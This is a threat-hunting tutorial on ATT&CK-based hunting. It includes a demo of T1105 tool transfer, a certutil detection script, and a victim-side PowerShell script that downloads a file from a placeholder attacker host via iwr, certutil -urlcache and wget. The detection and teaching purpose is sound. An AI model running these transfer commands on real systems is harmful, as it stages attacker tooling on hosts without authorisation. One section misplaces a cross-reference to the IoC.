
TTP-Based Threat Hunting – Why and How?

In its simplest definition, threat hunting is the process of proactively searching for evidence that an adversary has already reached the organization's network.

Despite the many precautions taken at the perimeter and the many technologies deployed there, breaches cannot be prevented entirely. As a result, technologies that detect whether an attacker is already inside have come to the fore in recent years. EDR and NDR products are built mainly for this purpose, and they use many different detection methods to do it.

Pyramid of Pain

In the event of a breach, the most effective way to lower dwell time is a regular and continuous threat hunting process. As the Pyramid of Pain above shows, there are several ways to hunt: with signatures, with IoCs, with anomaly detection, or with TTPs, and the higher up the pyramid an indicator sits, the more it costs the adversary to change it.

Atomic indicators such as the IP addresses, domains, or file hashes associated with a threat actor are the IoCs at the bottom of the pyramid: the attacker can change them trivially, and feeds of them are full of stale entries and false positives. When attackers register a new domain or obtain a new IP address, that infrastructure is unknown to the organization, and an IoC sweep cannot detect the attack.

Therefore, hunting on the attackers' TTPs gives much more accurate results. Attackers do not change the techniques they use frequently, especially when those techniques have succeeded before. The MITRE ATT&CK framework is the best catalogue of these techniques. Many organizations have already mapped their infrastructure and detections to ATT&CK or are still working on it; those that have not started should do so as soon as possible.

Threat Intelligence: For better and continuous threat hunting, threat intelligence is essential. ATT&CK contains many tactics and techniques, and analysts must use threat intel to decide where to start. A good starting point is to identify the actors likely to target the organization based on its country, region and sector; this prioritizes the TTPs to hunt for. It must also be ensured that the threat intel keeps this information up to date.

Developing Hypotheses: After prioritizing the TTPs, the next step is to create hypotheses. A hypothesis states the adversary behaviour we are looking for and determines which data must be collected to detect it; from the required data it follows which security controls the detection should be built on.

At this stage a gap analysis is also needed, to ensure that all of the related activity can actually be detected; if necessary, additional security controls should be added. This can be done with a security validation tool such as Verodin, since all of Verodin's tests and reports are ATT&CK based. Hunt teams should confirm both that they can obtain the needed logs from every part of the network and that these logs are sent to the SIEM regularly, so Verodin should be used for these steps as well.

This data selection phase also makes the SIEM more effective. By understanding the adversary's techniques, organizations can reduce the volume of data collected and therefore the log size. Analysts then encounter fewer false positive alerts, which saves time.

The most annoying thing in SIEM administration is the volume of data. So while we are collecting data from host or network security controls, we should make sure that we do not send useless data to the SIEM. Be careful: both EDR and especially NDR solutions can create huge amounts of data.

Ingress Tool Transfer (MITRE ATT&CK T1105)

Attackers may need to download tools to perform different actions on the victim machine: mostly tools that scan the network for lateral movement, or that establish persistence on the host. Whatever the tool, there are many ways to transfer it, and all of them are very easy to perform.

Here my victim machine is a Windows 10 client, and I assume that we have already exploited it and have a reverse connection. Now I create a web server on the attacker machine so that the victim can download from it. (These steps are a demo of T1105.)

Then I copy putty.exe to the web root as the file to transfer to the victim, and check whether the web server is working:

Ingress File Transfer with Powershell

The first way we try is PowerShell. Let's execute the command below in our C&C terminal to download putty.exe onto the victim's machine, then check the file:

"iwr" in the command is an alias of Invoke-WebRequest, a PowerShell cmdlet used to send HTTP and HTTPS requests to a web page or web service; with -OutFile it writes the response body to disk instead of returning it.

Ingress File Transfer with Certutil

Certutil.exe is a native Windows binary that is part of the certificate services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains (Src: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil).

Attackers use certutil.exe as a downloader: the -urlcache argument fetches a URL and saves it to disk, and the built-in -ping argument fetches a URL without writing a file, a memory-only download discovered by researcher Casey Smith (@SubTee).

Let's type the command below over the C&C connection on the victim's machine:

This command downloads the putty.exe that we placed on our web server at the beginning.

IoC for Detecting Downloading via Certutil

Everyone can create their own IoC for this method to fit their own environment. The IoC below looks for the -ping and -urlcache arguments in certutil.exe command lines (Src: fireeye.com).
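To make the IoC above runnable, and to show what the "Developing Hypotheses" step looks like for this technique, here is an added example of my own (not the FireEye IoC and not code from the original post) in PowerShell. The hypothesis is "certutil.exe, or a renamed copy of it, was run with -urlcache or -ping against a remote URL"; the data it needs is process-creation telemetry with the full command line (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled). Two caveats a hunter wants are built in: the check trusts the PE's OriginalFileName (recorded by Sysmon) over the on-disk name, so a renamed certutil is still caught, and it accepts either "-" or "/" as the switch prefix. The sample events are constructed for the demo, with 10.0.0.5 as a placeholder attacker host; the first three should match and the last two (a legitimate -dump and a cache cleanup with no URL) should not.

```powershell
# Added example, not the IoC from the original post. Hunting hypothesis for T1105 via
# certutil: "certutil.exe (or a renamed copy) was run with -urlcache or -ping against
# a remote URL". Data needed: process-creation events with the full command line
# (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled).

function Test-CertutilDownload {
    param(
        [string]$CommandLine      = '',
        [string]$OriginalFileName = '',   # present in Sysmon Event ID 1, absent in 4688
        [string]$Image            = ''
    )
    # 1) Is this certutil? Prefer the PE's OriginalFileName over the on-disk name so a
    #    renamed copy (e.g. c.exe) is still recognised. -eq and -match are case-insensitive.
    $isCertutil = ($OriginalFileName -eq 'CertUtil.exe') -or
                  ($Image -match '(^|\\)certutil\.exe$') -or
                  ($CommandLine -match '(^|[\\\s"])certutil(\.exe)?["\s]')
    # 2) The download switches named by the IoC, with either switch prefix.
    $hasSwitch  = $CommandLine -match '(^|\s)[-/](urlcache|ping)(\s|$)'
    # 3) A remote URL must be present; "certutil -urlcache * delete" (cache cleanup) has none.
    $hasUrl     = $CommandLine -match '\b(https?|ftp)://\S+'
    return [bool]($isCertutil -and $hasSwitch -and $hasUrl)
}

# Constructed sample events (placeholder host 10.0.0.5, not real telemetry).
$SampleEvents = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'; OriginalFileName = 'CertUtil.exe'
        CommandLine = 'certutil.exe -urlcache -split -f http://10.0.0.5:8000/putty.exe C:\Users\Public\putty.exe' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'; OriginalFileName = 'CertUtil.exe'
        CommandLine = 'certutil -ping http://10.0.0.5:8000/putty.exe' }
    [pscustomobject]@{ Image = 'C:\Users\Public\c.exe';            OriginalFileName = 'CertUtil.exe'
        CommandLine = 'c.exe /urlcache /f http://10.0.0.5:8000/putty.exe p.exe' }          # renamed binary
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'; OriginalFileName = 'CertUtil.exe'
        CommandLine = 'certutil -dump C:\certs\corp-ca.cer' }                               # legitimate admin use
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'; OriginalFileName = 'CertUtil.exe'
        CommandLine = 'certutil -urlcache * delete' }                                        # cleanup, no URL
)

# Run the hypothesis over the sample set and report what it flags.
$Hits = @($SampleEvents | Where-Object {
    Test-CertutilDownload -CommandLine $_.CommandLine -OriginalFileName $_.OriginalFileName -Image $_.Image
})
$Hits | Select-Object -Property Image, CommandLine | Format-Table -Wrap
"$($Hits.Count) of $($SampleEvents.Count) sample events match"

function Get-CertutilDownloadEvents {
    # The same test over live Sysmon process-creation telemetry (needs Sysmon installed
    # and an elevated prompt). Each event's EventData fields are flattened into one object.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $d = @{ TimeCreated = $_.TimeCreated }
            foreach ($f in $xml.Event.EventData.Data) { $d[$f.Name] = $f.'#text' }
            [pscustomobject]$d
        } |
        Where-Object { Test-CertutilDownload -CommandLine $_.CommandLine -OriginalFileName $_.OriginalFileName -Image $_.Image } |
        Select-Object -Property TimeCreated, User, ParentImage, Image, CommandLine
}
```

Running the script prints the three matching sample events; calling Get-CertutilDownloadEvents afterwards applies the same test to the host's real Sysmon log. Against Security 4688 events there is no OriginalFileName, so only the image and command-line checks apply, which is exactly the gap a rename exploits and a good reason to have Sysmon in the data collection plan.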


Ingress File Transfer with wget

wget is a command-line package that supports downloading files over HTTP, HTTPS, FTP and FTPS. It is easy to use in scripts because it is non-interactive. Note that GNU wget is not shipped with Windows; on a Windows 10 client, "wget" typed into PowerShell is an alias of Invoke-WebRequest. Using the C&C connection, let's run the command below on the victim's machine:
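The commands in the three sections above are shown as screenshots; the following PowerShell is an added example of my own (not the original post's commands) that performs all three transfers from the victim side and verifies the result. It assumes the attacker machine is 10.0.0.5 and serves putty.exe over plain HTTP on port 8000 (for instance from a simple Python http.server in the directory holding the file); both values are placeholders. The final two statements are the check a practitioner wants: the three copies must hash identically, and iwr and wget must resolve to the same cmdlet, which is why the PowerShell and "wget" variants look identical in process and network telemetry.

```powershell
# Added example, not the commands from the original post. Victim-side view of the
# three T1105 transfers. ASSUMPTIONS: the attacker machine is 10.0.0.5 and serves
# putty.exe over plain HTTP on port 8000; both values are placeholders.
$AttackerUrl = 'http://10.0.0.5:8000/putty.exe'
$DropDir     = Join-Path $env:TEMP 't1105'
New-Item -ItemType Directory -Path $DropDir -Force | Out-Null

# 1) PowerShell. iwr is an alias of Invoke-WebRequest; -OutFile writes the response body
#    to disk, -UseBasicParsing avoids the Internet Explorer dependency in Windows PowerShell 5.1.
iwr -Uri $AttackerUrl -OutFile (Join-Path $DropDir 'putty_iwr.exe') -UseBasicParsing

# 2) certutil. -urlcache fetches the URL (and keeps a copy in the per-user URL cache),
#    -split saves the fetched data to the named output file, -f forces an overwrite.
certutil.exe -urlcache -split -f $AttackerUrl (Join-Path $DropDir 'putty_certutil.exe')

# 3) "wget". GNU wget is not installed on a stock Windows 10 client. Inside Windows
#    PowerShell 5.1, wget is simply another alias of Invoke-WebRequest, so it produces
#    the same process and the same network behaviour as (1).
wget -Uri $AttackerUrl -OutFile (Join-Path $DropDir 'putty_wget.exe') -UseBasicParsing

# Verify the transfers: all three files should have identical size and SHA256. The hash
# is the atomic indicator (bottom of the Pyramid of Pain) that an IoC sweep would use.
Get-ChildItem -Path $DropDir -Filter '*.exe' | ForEach-Object {
    [pscustomobject]@{
        Name   = $_.Name
        Bytes  = $_.Length
        SHA256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
    }
} | Format-Table -AutoSize

# Show that iwr and wget resolve to the same cmdlet on this host.
Get-Alias -Name iwr, wget | Select-Object -Property Name, Definition
```

The -urlcache variant also leaves a copy of the download in the user's URL cache (certutil -urlcache can list it), which is a host artifact worth knowing about when you hunt for this technique after the fact; the certutil binary's command line is what the IoC in the next section keys on.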